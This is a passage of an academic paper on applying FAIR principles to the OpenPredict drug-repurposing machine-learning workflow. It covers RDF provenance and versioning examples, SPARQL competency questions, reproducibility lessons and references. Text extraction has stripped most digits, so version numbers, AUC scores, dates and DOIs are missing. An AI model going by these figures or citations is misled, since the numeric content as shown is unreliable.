peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. prov:generation through the prov:qualifiedgeneration property, which specifies when the generation occurred with (prov:attime). this is an example: opredict: activity_model_preparation_train_and_evaluation_execution_ rdf:type p-plan:activity ; p-plan:correspondstostep opredict: step_model_preparation_train_and_evaluation ; prov:generated opredict:modelevaluation_accuracy_execution_ ; prov:generated opredict: modelevaluation_averageprecision_execution_ ; prov:generated opredict:modelevaluation_f _execution_ ; prov:generated opredict:modelevaluation_precision_ ; prov:generated opredict:modelevaluation_recall_execution_ ; prov:generated opredict:modelevaluation_rocauc_execution_ ; . opredict:modelevaluation_accuracy_execution_ rdf:type mls:modelevaluation ; dc:description " . " ; mls:specifiedby opredict:evaluationmeasure_predictiveaccuracy ; prov:qualifiedgeneration opredict:generation_execution_ ; . opredict:generation_execution_ rdf:type prov:generation ; prov:attime " - - t : : . "^^ xsd:datetime ; versioning of workflows we track the modification across the two versions with the dc:hasversion property on the level of a dul:workflow, p-plan:plan, dc:linguisticsystem, and prov:softwareagent. furthermore, we use the prov:wasrevisionof property to link to the previous version. this is an example: opredict:plan_main_protocol_v rdf:type p-plan:plan ; rdf:type dul:workflow ; dc:created " - - " ; dc:creator opredict:agent_remzi ; dc:description "openpredict main protocol v. . " ; dc:hasversion " . " ; dc:language :linguisticsystem_xsd_language_english ; dc:modified " - - " ; pwo:hasfirststep opredict:step_prepare_input_data_files_v ; rdfs:label "main protocol v. . " ; prov:wasattributedto opredict:agent_remzi ; prov:wasrevisionof opredict:plan_main_protocol_v ; . opredict:plan_main_protocol_v rdf:type p-plan:plan ; rdf:type dul:workflow ; dc:created " - - " ; dc:creator opredict:agent_remzi ; dc:description "openpredict main protocol v. . " ; dc:hasversion " . " ; dc:language :linguisticsystem_xsd_language_english ; dc:modified " - - " ; pwo:hasfirststep opredict:step_prepare_input_data_files ; rdfs:label "main protocol v. . " ; prov:wasattributedto opredict:agent_remzi ; celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. evaluation in this section we describe the evaluation of our approach, consisting of two parts: first, we revisit each fair principle and explain how the principle is addressed. second, we applied the traditional ontology validation methodology by answering the competency questions through the execution of sparql queries (the concrete queries are available in github repo). addressing the fair principles in order for our workflow to comply with fair principles, we checked each fair criterion defined in wilkinson et al. ( ), as identified between parentheses below. first, global and persistent identifiers were assigned to resources defined in the workflow and associated data. rich metadata for workflow and input and output data were created using hcls (https://www.w .org/tr/hcls-dataset/) and fair data point specification (f ). in addition, the metadata we generated contains an explicit global and persistent identifier of the data they describe (f ). in order to enable the workflow and the data used to be searched, they were uploaded in a triple-store as a fair data point (https://graphdb.dumontierlab.com/repositories/openpredict). data can be queried through sparql over http(s) protocol (a . ). since the data is not private or protected, we don’t require authentication and authorisation mechanism (a . ). all data and metadata are permanently available at zenodo (https://doi.org/ . /zenodo. ) to make the metadata accessible even the data is no longer available (a ). we used rdf and owl with commonly used controlled vocabularies and ontologies such as bio rdf vocabulary, sio and prov to model input data and workflows (i ). hcls dataset specification and fair data point specification were used to define the metadata and provenance of data (i ). meaningful links between (meta)data such bio rdf links and data and workflow were created (i ). to increase reusability of the workflow, we describe the workflow and its data with community standards such as ml-schema and p-plan (r ). we provide the license (r . ) and provenance information in the metadata using fair data point specification (r . ), and hcls specification (r . ) and prov. answering competency questions besides evaluating whether each fair principle was addressed, we also assessed the unified model using the common semantic validation approach, which is based on sparql queries used to answer the competency questions. all questions listed in ‘the fair workflows approach’ could be answered by running the sparql queries over the openpredict use case. the complete queries and results can be found online (https://github.com/fair-workflows/openpredict). therefore, the reproduction of this validation can be performed by re-executing the queries on the rdf representation of the openpredict workflow. below we explain the result for each competency question. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/hcls-dataset/ https://graphdb.dumontierlab.com/repositories/openpredict https://doi.org/ . /zenodo. https://github.com/fair-workflows/openpredict http://dx.doi.org/ . /peerj-cs. cq - questions about manual steps. cq . : which steps are meant to be executed manually and which to be executed computationally? the sparql query we built to answer this question first filters all steps within the first version of openpredict workflow (opredict:plan_main_protocol_v ). the results show each step and its type—manual (bpmn:manualtask) or computational (bpmn:scripttask)—as well as the respective instructions (p-plan:plan) that describe the steps. in summary, openpredict v . has manual steps and computational steps ( in total), while v . has manual steps and computational steps ( in total). this difference reflects the automatization of most of the manual steps within data preparation (evolving from manual to computational) and the simplification of the computational steps described in fewer jupyter notebook cells. cq . :for the manual steps, who are the agents responsible to execute them? to answer this question we filtered the results for only manual steps through the statement: values ?steptype bpmn:manualtask the result is a list of all steps and roles related to each one, such as executor, creator, developer, and publisher. for example, remzi is creator, developer and executor of all instructions, while ahmed is developer of some computational steps and joao is the executor of the entire openpredict workflow. this approach allows for the representation of multiple roles played by different agents within each step. as in related approaches such as workflow ever and reproduce-me, we use the prov ontology to address the different types of agents and roles through the prov:wasattributedto property, and apply the dc:creator and dc:publisher properties for the direct relation from an instruction to an agent. cq . : which datasets were manually handled and what are their formats? openpredict’s computational steps use datasets, as explained in ‘fairified data collection’, that required manual pre-processing. the difference between v . and v . is that we automated the manual pre-processing of two datasets in v . ; mesh phenotype annotations and protein-protein inter-actions. the main elements of the query reflect the fair data point specification with dcat elements (dcat:distribution, dcat:downloadurl and dcat:mediatype), prov (prov:usage and prov:qualifiedusage) and edam classification for data handling steps (edam:operation_ ) and data formats (media types). cq . : what are the types of manual steps involved, and what are their inputs and outputs? similar to the reproduce-me approach, our ontology leverages on the p-plan ontology to address the variables used as input and output of the manual steps, mostly during data preparation in openpredict v . , such as downloading and saving the datasets listed in the results of cq . . for example, the input of opredict:step_save_files_in_triplestore are variables that indicate the local file of each dataset (serialized as rdf) and the output variable indicating the endpoint to upload all datasets (opredict:variable_triplestore_endpoint_for_input_data). celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when changing the filter from manual steps to computational steps, the pattern followed was to classify the output variables of a step (a jupyter notebook cell) according to the data saved in files. for example, in feature generation, the opredict:step_feature_generation_ _pipeline_source_cell has an output variable for drug fingerprint similarity, indicating the generation of the file ‘‘drugs-fingerprint-sim.csv’’. cq - questions about instantiation of general workflows by more specific ones. cq . : what are the main steps of a general workflow? openpredict workflow follows the common machine learning pipeline process of: data preparation, feature generation, model training, model evaluation and presentation of results. the query returns these steps by looking for the first step of the workflow (through pwo:hasfirststep) and following the preceding path in a recursive way, e.g., ?step dul:precedes ?step . ?step dul:precedes ?step . ?step dul:precedes ?step . (until there is no preceding steps) the classification of the step is given by the edam specializations of the operation concept (operation_ ), such as data handling for data preparation (edam:operation_ ). for the sake of simplicity, model training and evaluation were performed within the same step. the main steps are listed below: opredict:step_prepare_input_data_files opredict:step_feature_generation_pipeline_openpredict_ipynb opredict: step_model_preparation_train_and_evaluation_workflow_openpredcit_ - _ml_ipynb opredict:step_format_results_for_presentation cq . : what are the steps of a specific workflow? similar to the previous question, the sparql query uses the properties that allow for the ordering of steps execution (pwo:hasfirststep and dul:precedes). the pattern p- plan:step dul:isdescribedby p-plan:plan allows us to answer this question, by representing how a step is described by an instruction. this pattern resembles the one used by workflow ever, which applies the wfdesc:hasworkflowdefinition (dul:isdescribed) to link a wfdesc:workflow (p-plan:step) to a wfdesc:workflowdefinition (p-plan:plan), aiming at representing the instructions (e.g., a python script) that are natively understood by the wfdesc:workflowengine (prov:softwareagent). however, different from this approach, we classify the instruction language (p-plan:plan dc:language dc:linguisticsystem), allowing for the representation of instructions that follow computer language or natural language, which includes pseudo-code—commonly used to specify algorithms before implementing in a particular computer language. the results show that openpredict has steps in total, where steps belong to v . and belong to v . , each step linked to an instruction. instructions were reused from v . to v . regarding data preparation, thus, v . presents new instructions that are used to automate the data preparation phase. these instructions are written as either english (natural language) or python . (computer language), where most of the python celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ones refer to the jupyter notebook cells for feature generation and model training and evaluation. cq . : what higher-level description does a certain workflow step instantiate? the sparql query to answer this question includes the pattern p-plan:plan dul:isdescribedby p-plan:plan, which extends the capability described in the previous question, i.e., decoupling steps from instructions, enabling the representation of different abstraction levels of instructions and their relations. this pattern resembles the links between specification artefacts (e.g., conceptual model, activity diagrams and use cases) and implementation artefacts (e.g., software code, deployment procedures and automated tests) in software engineering. usually, a specification artefact aims at describing the instructions necessary to enable a programmer to create the software code, sometimes automatically generated as in model-driven engineering. for example, a pseudo-code within an activity diagram (p-plan:plan) may describe the behaviour expected (dul:isdescribed) for the algorithm behind a service endpoint, which may be implemented as a python script (p-plan:plan). openpredict did not formally follow the specification phase of software engineering since it is a research project, having the code developed from the data scientist interpretation perspective about publications related to predict. in research-oriented data science this type of approach is common. however, we created some examples of the pattern that represent the specification of openpredict workflow. therefore, the results of this query include jupyter notebook cell instructions (p-plan:plan), representing implementation artefacts, that were specified (p-plan:isdescribedby) by specification instructions (p- plan:plan). the level of abstraction can be derived from the properties of the instruction. for example, the jupyter notebook cell instructions were written (dc:language) in python . (schema:computerlanguage), while the specification instructions were written in english (en value of xsd:language). furthermore, this approach enables links of s (specification artefacts) x i (implementation artefacts), where i¿s, i.e., a specification artefact usually describes several software code lines (instructions). in openpredict, the first specification instruction guides the load of input datasets, which is linked to cells – of the feature generation step, while the second guides the calculation of scores between pairs of drugs and compute similarity feature, which is linked to cells – . cq - questions about versioning of workflows and their executions cq . : what are the existing versions of a workflow and what are their provenance? the collective workflow (the whole) is represented as a dul:workflow and a p-plan:plan. similar to other approaches (workflow ever, reproduce-me, cwlprov, among others) the query to answer this question makes use of dc properties (e.g., dc:creator, dc:created, dc:modified) and prov (e.g., prov:wasattributedto) for prospective provenance. it also covers workflow versioning through dc:hasversion and prov:wasrevisionof, where the former is responsible for version of dul:workflow and the latter to link an instruction to another (p-plan:plan prov:wasrevisionof p-plan:plan pattern). the retrospective celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (executions) provenance is supported by the link from an execution (a p-plan:activity) to the correspondent step (p-plan:correspondstostep property), which is a pattern that resembles most of the aforementioned semantic models. the main difference here is the assumption that any instruction (p-plan:plan) should be versionable, thus, all executions link to a versioned instruction. differently from workflow ever approach, here we do not introduce any elements regarding the specification of the changes (e.g., roevo:changespecification). the results for openpredict show workflows (v . and v . ), both created by and attributed to remzi, where v . links to the prior version (v . ). cq . : which instructions were removed/changed/added from one version to another? three sparql queries were written to answer whether the instructions of openpredict v . were removed or changed or added in v . . each sparql uses the identifier of the workflow versions (retrieved in cq . ) as an input parameter to perform the comparison from one version to another. for the query for removed instructions, it considers all instructions used in v . that are not used in v . and excludes the instructions that were changed. for the query for changed instructions, it considers the instructions with the prov:wasrevisionof property. for the query for added instructions, the sparql query uses the reverse logic from the removed. forty-seven instructions were removed from v . to v . due to the refactoring of the code of feature generation, model training and model evaluation, and the elimination of several manual steps in data preparation. three instructions were changed, reflecting the porting of the fairification manual steps to computational steps in data preparation, i.e., download and save human interactome and phenotype annotations. seven instructions were added in v . , where of them represent the new python scripts for data preparation of the new data sources, other represent the new scripts for feature generation and the remaining for model training. cq . : which steps were automatized from one version to another? this query is quite similar to the one used for changed instructions (cq . ) but it makes explicit that the old version of the instruction used as manual step (bpmn:manualtask) was modified to an instruction used as computational step (bpmn:scripttask) in the new version. the results confirm the findings from the previous query regarding the instructions that were ported from manual steps to computational steps, namely the data preparation top-level instruction, the fairification instructions (download and save human interactome and phenotype annotations). although our approach covers change management, we face the same challenges regarding the dependency of the developer practices for code versioning. this means that, for example, a developer is free to choose whether to remove files from an old version of the software implementation and add files to the new version, even though these files refer to the same capability or routines. most of the version controls track the changes when the files (old and new) have the same name and path (i.e., the step identifier), which is a similar approach used here. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cq . : which datasets were removed, changed, or added from one version to the next? this question can be answered by mixing the same query of cq . (datasets manually used) with the logic used in query cq . , i.e., one sparql query to the datasets removed, one for the changed and one for the added. the query results over openpredict (v . and v . ) confirm the findings of cq . , where none datasets were removed from the old version to the new, none changed and were added. cq . : which workflow version was used in each execution and what was generated? this question is answered by using the pattern p-plan:activity p-plan:correspondstostep p-plan:step, where the step is part of the dul:workflow that provides the workflow version. the openpredict workflow had executions represented with our unified model, exemplifying the execution of some computational steps, i.e., each one a particular jupyter notebook cell. therefore, this approach allows for the representation of multiple executions of each step according to the version of the corresponding instruction. each execution inherits the properties of p-plan:activity, e.g., the event start and end time points. furthermore, each execution is associated to the correspondent generated artefacts through the p-plan:activity prov:generated opmw:workflowexecutionartifact pattern, a similar approach of workflow ever, which applied the inverse property prov:wasgeneratedby. an artefact generated by an execution can be an evaluation measure of the trained model, such as the model accuracy and recall for that particular execution, i.e., a mls:modelevaluation. therefore, openpredict executions generated the values about the model evaluation measures of accuracy, average precision, f , precision, recall and roc auc. for example, the results show that the model accuracy of v . is . , while v . is . . this query can be further extended by considering the particular version of each instruction that the executed step implements. in addition, ideally, each output of a jupyter notebook cell should be represented as a opmw:workflowexecutionartifact, so all generated outputs are stored (similar to provbook/reproduce-me approach). this query can be easily changed to provide aggregations for related analytical questions, such as how often each workflow version was executed. discussion before we move on to discuss the encountered reproducibility challenges and other issues, we would like to first highlight the two fair perspectives that our approach embodies and demonstrates. firstly, fair applies to the datasets that a scientific workflow consumes and produces, e.g., the protein–protein interactions dataset used by openpredict, and we need fairification approaches to raise existing datsets to this standard. this is the aspect the fair principles originally focused on. on top of that, we have here proposed and exemplified a second perspective. this additional perspective regards the workflows’ own fairification, i.e., the process of aligning them with the fair principles, which relies on a semantic modelling approach such as the one described in this paper. our work therefore celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. expands the notions of fair and fairification from the relatively static artifacts of datasets to the dynamic processes of workflows. reproducibility challenges it was expected that our study would be unable to fully reproduce the accuracy of the method reported in the predict paper due to use of different input datasets. the performance results of this study are lower than originally reported. the predict paper reported an auc of . in cross-validation, but using the same gold standard, we could only achieve auc of . . we were also able to obtain the drug and disease similarity matrices used in predict from the authors via email request. given drug–drug similarity measures for drugs and disease–disease similarity measures for diseases, there are resulting features of combined drug-disease similarities. the logistic classifiers were trained with these pre- computed similarity scores and an average auc of . was obtained from repetitions in a -fold cross-validation scheme. this is still a significant difference from the auc of . what the authors reported in predict study. this indicates that there was more likely an error in the design or implementation of evaluation, and not the aggregation of data nor the calculation of drug-drug and disease-disease similarity scores. while attempting to reproduce the predict study, we faced the following issues, which we have turned into generic recommendations (highlighted in italics). . insufficient documentation essential details concerning the calculation of features were not clearly defined, nor was the software code to perform the calculations provided. many details of an experiment, including data sets, processing parameters and applied software and algorithms need to be specified in order to facilitate the replication of the results. a methods section in a scientific article may not be the best place to provide all this information as it is usually limited by size constraints and different organization styles of journals and conference proceedings, leading to a lack of required detail. . inaccessible or missing data since no data except the gold standard data (drug–disease associations) were given, the features for the predict workflow were reconstructed using the publicly accessible databases drugbank and kegg and sider. however, we could not check if this resulted in exactly the same datasets. the original data that were available to the authors could be absent or no longer accessible to others for many reasons. sufficient data should be published to enable reproducing a study. . versioning and change of data in predict, publicly accessible datasets have been used to construct models and validate hypotheses for prediction of drug indications and drugs were identified by their drugbank ids. however, drugbank ids are subject to change over time. for example, two drugs (db , db ) in the original dataset were merged to the same drug within the current version of the drugbank. results or hypotheses may change as a result of updated input data. in order to reconstruct the original conclusion, it is important to record the version or the date of the data that were used in a study. this is especially important as publicly accessible datasets are increasingly used to construct models and validate hypotheses for prediction of drug indications. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . execution environment and third-party dependencies in the predict study, the versions of some software tools, such as the library for semantic similarity calculation, were not specified. the versions of software libraries, packages and tools used in a workflow should be explicitly mentioned, and an effort must be made to maintain the access to those releases used in the original workflow. further issues encountered while the execution of the fairification process in the openpredict was straightforward, the semantic modelling of the unified workflow model was challenging. the reuse of existing semantic vocabularies for the representation of our unified model proved to be an extensive task. there are several existing semantic approaches to represent workflows that present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. computational workflow languages such as cwl and wdl do not intend to define a semantic representation for workflows that involve both manual and computational steps and enrich the workflows with sufficient metadata to make them fair. the prospective part of workflow ever implementation (wfdesc (https://raw.github.com/wf ever/ro/ . /wfdesc.owl)) has consistency issues such as missing disjointness and licensing elements, besides not conforming to the documentation (e.g., for all elements related to workflow templates). on the other hand, semantic models like dul, prov and p-plan presented higher quality and common foundations (in dolce), while being easier to reuse and extend. although cwlprov also provides an ontology-based on w ever semantic models, it is oriented only to retrospective provenance of computational steps, reusing most of the predicates that p-plan extends (from prov). furthermore, the uri (https://w id.org/cwl/prov#) does not provide a concrete description of the new predicates (e.g., cwlprov:image) and neither resolves to the rdf model (tbox). a question that may arise is whether it would be better to create a new ontology from scratch rather than creating a unified model based on the existing ontologies. we believe that high quality semantic models should be reused, taking benefit from the lessons learned. furthermore, we consider that reusing existing semantic workflow models actually improve semantic interoperability, while creating a new ontology may impede interoperability if it is not accompanied with alignments to the existing semantic models. therefore, our approach appears to lead to an improved semantic interoperability. because we reused several semantic models, the competency questions that they target are potentially addressed by our approach. for example, the gap in our approach regarding the representation of change management for versioning can be addressed by reusing some elements from the versioning approach of workflow ever, e.g., roevo:change, roevo:changespecification and roevo:versionableresource. deciding which type of approach should be used for role representation should be based on the needs for either a fine-grained definition of the role/relator pattern (a reified relationship), such as the prov:association approach, or a simple property, such as dc:creator. while the former ( ) enriches the definition of the role (an improved representation capability), the latter ( ) is less verbose: celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://raw.github.com/wf ever/ro/ . /wfdesc.owl https://w id.org/cwl/prov# http://dx.doi.org/ . /peerj-cs. ( ) ?association prov:agent opredict:remzi; prov:hadrole opredict:creator; prov:hadplan ?plan. ( ) ?plan dc:creator ’remzi ’ . one of the main challenges is to understand the different terminology used for similar conceptualizations. although the definitions of terms like plan, process, protocol, procedure, workflow, plan specification and standard operating procedure seem to be the same (or quite overlapping), their meanings become notoriously ambiguous across varied communities. how to grasp these semantic differences is a crucial question that needs further exploration. for example, in the bioinformatics community, the term workflow usually refer to an implemented (computational) piece of software, i.e., a set of programming language instructions, usually developed with a workflow management system as a workflow application (da cruz, campos & mattoso, ). meanwhile, in software engineering, the workflow term is usually referred to a detailed business process within the business process modelling (bpm) research. usually, the bpm languages conform to graphical notations (e.g., bpmn, epc, aris), targeted to human comprehension rather than computational ends (process design/modelling). additionally, some bpm languages focus on representing, at a lower level of abstraction, the process execution details, e.g., bpel (process implementation) (rosemann & vom brocke, ). this is a topic extensively covered by service oriented architecture (soa) initiatives. several related works target the gap that exists between business process models and workflow specifications and implementations, such as service composition schemes (stephan, thomas & manfred, ) and formal provenance of process executions and versioning (krishna, poizat & salan, ). furthermore, some of these languages provide predicades for forks and conditionals, which were intentionally not included in the unified model since they have a high complexity - it is still a topic under discussion in the cwl community, for example. in future work we will improve the modelling of manual steps by studying and possibly incorporating predicates from the smart protocols ontology. we will characterize the abstraction levels of workflows based on multi-level process modelling approaches, such as the widespread adopted apqc’s process classification framework (pcf). the pcf provides abstraction levels for process specification, from a high abstraction level to detailed workflow specification: category (level ), process group (level ), process (level ), activity (level ) and task (level ). although this framework aims at providing a methodological approach for business process specification, we should investigate whether the minimal information elements of each level require proper representation in the ontology. we should also consider the challenges of process refinement (’’process description in a more fine-grained representation’’) (ren et al., ). a process refinement mechanism maps and/or derives models from a higher-level specification to a detailed level, equivalent to vertical and exogenous model transformations in model-driven engineering. typical refinement categories will be investigated, such as activity decomposition principles about event delivery and execution condition transference (jiang et al., ; muehlen & celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rosemann, ). the representation of intentionality of the activities within business processes will also be addressed in future work through goal-oriented semantic process modeling (horkoff et al., ), linking goals to activities and roles. industry-oriented approaches are also being investigated, such as extract, transform and loading (etl/elt) for data warehousing and sql server integration services, which considers a workflow as a control flow, while a dataflow transforms data from a source to a destination. furthermore, product line management (plm) tools should be investigated, especially the ones that cover laboratory information management system (lims), which provides important concepts such as bill-of-materials (bom), specifications and their certifications. for example, in plm a specification is a description of raw materials and packaging materials, and semi-finished and finished products. this description may contain product characteristics (e.g., chemical compounds), recipes (e.g., bom), production methods, quality norms and methods, artwork, documents and others. ultimately, initiatives like cwl, the center for expanded data annotation and retrieval (cedar) (for metadata management) (gonalves et al., ) and fairsharing.org (for indexing fair standards) may be used as building blocks for the envisioned fair workbench tool, which can be a reference implementation over a workflow system such as jupyter notebook (e.g., a plug-in). finally, the validation of the reproducibility level of a workflow should consider specific fair metrics that take in consideration specific recommendations (e.g., from cwlprov approach) and the practices for higher reproducibility of jupyter notebooks (pimentel et al., ). conclusions in this work, we examined how fair principles can be applied to scientific workflows. we adopted the fair principles to make the predict workflow, a drug repurposing workflow based on machine learning, open, reproducible, and interoperable. from this stems, the main contribution of this paper, the openpredict case study, which demonstrates how to make a machine learning workflow fair and open. to do this, we created a unified model that reuses several semantic models to show how a workflow can be semantically modeled. we published the workflow representation, data and meta-data in a triple store which was used as fair data point. in addition, new competency questions have been defined for fair workflows and how these questions can be answered through sparql queries. among the main lessons learned, we highlight how the main existing workflow modelling approaches can be reused and enhanced by our unified model. however, reusing these semantic models showed to be a challenging task, once they present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. in the future, we envision that the intensive human effort that we had to perform in order to make a workflow fair will be taken care of by smart and intuitive workflow tools. as a prototype of such a tool, we are currently developing the fair workbench as a general tool that allows users to deal with workflows and protocols in a semantic and fair form. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by the dutch research council (nwo) (no. . . ) and the netherlands escience center (no.nlesc p . ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: dutch research council: . . . netherlands escience center (no. nlesc p . ): nlesc p . . competing interests the authors declare there are no competing interests. author contributions • remzi celebi and joao rebelo moreira conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ahmed a. hassan analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • sandeep ayyar analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. • lars ridder, tobias kuhn and michel dumontier conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/fair-workflows/openpredict. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ashburn tt, thor kb. . drug repositioning: identifying and developing new uses for existing drugs. nature reviews drug discovery ( ): – doi . /nrd . baker m. . , scientists lift the lid on reproducibility. nature ( ): – doi . / a. barrell d, dimmer e, huntley rp, binns d, odonovan c, apweiler r. . the goa database in —an integrated gene ontology annotation resource. nucleic acids research (suppl_ ):d –d . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/fair-workflows/openpredict http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nrd http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. barrett t, edgar r. . gene expression omnibus: microarray data storage, submis- sion, retrieval, and analysis. in: methods in enzymology. vol. . united states: elsevier, – doi . /s - ( ) - . begley cg, ellis lm. . drug development: raise standards for preclinical cancer research. nature ( ): – doi . / a. belhajjame k, zhao j, garijo d, gamble m, hettne k, palma r, mina e, corcho o, gmez-pérez jm, bechhofer s, klyne g, goble c. . using a suite of ontologies for preserving workflow-centric research objects. journal of web semantics : – doi . /j.websem. . . . bisgin h, liu z, fang h, kelly r, xu x, tong w. . a phenome-guided drug repositioning through a latent variable model. bmc bioinformatics ( ): – doi . / - - - . bizer c, heath t, berners-lee t. . linked data-the story so far. international journal on semantic web and information systems ( ): – . borgo s, masolo c. . ontological foundations of dolce. in: poli r, healy m, kameas a, eds. theory and applications of ontology: computer applications. dordrecht: springer, – doi . / - - - - _ - - - - . callahan a, cruz-toledo j, dumontier m. . ontology-based querying with bio rdfs linked open data. journal of biomedical semantics ( ): – . caniza h, romero ae, paccanaro a. . a network medicine approach to quantify distance between hereditary disease modules on the interactome. scientific reports : . cheng f, liu c, jiang j, lu w, li w, liu g, zhou w, huang j, tang y. . prediction of drug-target interactions and drug repositioning via network-based inference. plos computational biology ( ):e doi . /journal.pcbi. . cohen-boulakia s, belhajjame k, collin o, chopard j, froidevaux c, gaignard a, hinsen k, larmande p, bras yl, lemoine f, mareuil f, mnager h, pradal c, blanchet c. . scientific workflows for computational reproducibility in the life sciences: status, challenges and opportunities. future generation computer systems : – doi . /j.future. . . . collins s, genova f, harrower n, hodson s, jones s, laaksonen l, mietchen d, petrauskaitė r, wittenburg p. . turning fair into reality: final report and action plan from the european commission expert group on fair data. doi . / . correa publio g, esteves d, lawrynowicz a, panov p, soldatova l, soru t, vanschoren j, zafar h. . ml-schema: exposing the semantics of machine learning with schemas and ontologies. in: reproducibility in machine learning workshop, icml. crowdflower. . data science report. available at https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf (accessed on october ). da cruz sms, campos mlm, mattoso m. . a foundational ontology to support scientific experiments. in: ceur workshop proceedings. – . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / a http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - - _ - - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf https://visit.figure-eight.com/rs/ -zbe- /images/crowdflower_datasciencereport_ .pdf http://dx.doi.org/ . /peerj-cs. garijo d, gil y. . augmenting prov with plans in p-plan: scientific processes as linked data. in: lisc@iswc. giraldo o, garcía a, lópez f, corcho o. . using semantics for representing experimental protocols. journal of biomedical semantics : article . gonalves rs, o’connor mj, martnez-romero m, egyedi al, willrett d, graybeal j, musen ma. . the cedar workbench: an ontology-assisted environment for authoring metadata that describe scientific experiments. in: the semantic web— iswc . doi . / - - - - _ . gottlieb a, stein gy, ruppin e, sharan r. . predict: a method for inferring novel drug indications with application to personalized medicine. molecular systems biology ( ): doi . /msb. . . gray ka, yates b, seal rl, wright mw, bruford ea. . genenames. org: the hgnc resources in . nucleic acids research (d ):d –d . guizzardi g, wagner g, almeida jpa, guizzardi rss. . towards ontological foundations for conceptual modeling: the unified foundational ontology (ufo) story. applied ontology ( – ): – doi . /ao- . hartanto ha, sarno r, ariyani nf. . warning criterion ontology for measuring of compliance in standard operating procedure implementation. journal of theoretical and applied information technology ( ): – . hettne k, wolstencroft k, belhajjame k, goble c, mina e, dharuri h, verdes- montenegro l, garrido j, de roure d, roos m. . best practices for workflow design: how to prevent workflow decay. in: ceur workshop proceedings, . hoehndorf r, hiebert t, hardy nw, schofield pn, gkoutos gv, dumontier m. . mouse model phenotypes provide information about human drug targets. bioinformatics ( ): – doi . /bioinformatics/btt . horkoff j, aydemir fb, cardoso e, li t, maté a, paja e, salnitri m, piras l, my- lopoulos j, giorgini p. . goal-oriented requirements engineering: an ex- tended systematic mapping study. requirements engineering ( ): – doi . /s - - -z. imming m, böhmer j, companjen b, emery t, groep d, murchison k, schoonhoven r, sesink l, som de cerff w, sterl a, franke w. . fair data advanced use cases: from principles to practice in the netherlands. zenodo. ioannidis jpa. a. contradicted and initially stronger effects in highly cited clinical research. jama ( ): – doi . /jama. . . . ioannidis jpa. b. why most published research findings are false. plos medicine ( ):e doi . /journal.pmed. . jacobsen a, kaliyaperumal r, da silva santos lob, mons b, schultes e, roos m, thompson m. . a generic workflow for the data fairification process. data intelligence : – . jiang y, xiao n, zhang y, zhang l. . a novel flexible activity refinement ap- proach for improving workflow process flexibility. computers in industry : – doi . /j.compind. . . . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /ao- http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /j.compind. . . http://dx.doi.org/ . /peerj-cs. kanehisa m, araki m, goto s, hattori m, hirakawa m, itoh m, katayama t, kawashima s, okuda s, tokimatsu t, yamanishi y. . kegg for linking genomes to life and the environment. nucleic acids research (database):d –d doi . /nar/gkm . khan fz, soiland-reyes s, sinnott ro, lonie a, goble c, crusoe mr. . sharing interoperable work ow provenance: a review of best practices and their practical application in cwlprov. gigascience – doi . /zenodo. . klein ra, ratliff ka, vianello m, adams jr rb, bahnǐk v, bernstein mj, bocian k, brandt mj, brooks b, brumbaugh cc, cemalcilar z, chandler j, cheong w, davis we, devos t, eisner m, frankowska n, furrow d, galliani em, hasselman f, hicks ja, hovermale jf, hunt sj, huntsinger jr, ijzerman h, john m-s, joy-gaba ja, barry kappes h, krueger le, kurtz j, levitan ca, mallett rk, morris wl, nelson aj, nier ja, packard g, pilati r, rutchick am, schmidt k, skorinko jl, smith r, steiner tg, storbeck j, van swol lm, thompson d, van ’t veer ae, vaughn la, vranka m, wichman al, woodzicka ja, nosek ba. . investigating variation in replicability: a ‘‘many labs’’ replication project. social psychology ( ): – doi . / - /a . 